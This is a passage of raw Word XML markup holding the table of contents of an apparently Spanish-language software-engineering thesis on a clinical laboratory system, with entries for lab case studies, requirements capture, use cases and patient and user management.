              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371295" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Casos de Estudio</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371295 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</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296" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Caso de Estudio #01: “Laboratorio BIOVirtual”</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371296 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</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297" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Caso de Estudio #02: “Laboratorio ZUNA”</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371297 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</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298" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.1.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Caso de Estudio #03: “Laboratorio IBC”</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371298 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371299" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Captura de Requisitos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371299 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371300" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Modelo de Negocio</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371300 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</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01" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identificación de Procesos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371301 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</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02" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Modelo de Dominio</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371302 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371303" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Identificar Actores y Casos De Uso</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371303 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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04" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371304 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</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05" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Casos de Uso</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371305 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371306" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detalle de Casos de Uso</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371306 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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07" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
              </w:rPr>
              <w:t>3.3.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar usuarios</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371307 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</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08" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Asignar privilegios</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371308 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</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09" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Gestionar pacientes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371309 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</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10" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
